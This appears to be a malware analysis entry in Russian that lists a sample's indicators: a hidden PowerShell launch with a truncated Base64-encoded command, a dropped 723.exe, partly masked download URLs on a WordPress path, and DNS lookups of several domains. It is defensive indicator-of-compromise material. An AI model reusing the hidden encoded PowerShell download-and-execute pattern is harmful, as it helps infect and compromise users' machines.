Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -enco JABKAGoAcgB5AGoAZQBmAHkAbABxAGoAPQAnAFAAcgB5AGoAdwBnAHoAaAB0AHgAagB1ACcAOwAkAEsAYwBlAGIAawBhAG4AYQB1AGIAcwAgAD0AIAAnADcAMgAzACcAOwAkAE4AYwBnAGQAbQBrAHcAaQB6AD0AJwBHAGI...
- %HOMEPATH%\723.exe
- %HOMEPATH%\723.exe
- http://bi###stem1.com/wp-admin/wzkv/
- http://bi###stem1.com/cgi-sys/suspendedpage.cgi
- DNS ASK bi###stem1.com
- DNS ASK ta###-hr.com
- DNS ASK ta###-hr.co.il
- DNS ASK br##a.net
- DNS ASK 36######sso.socerj.org.br
- DNS ASK ho##pam.com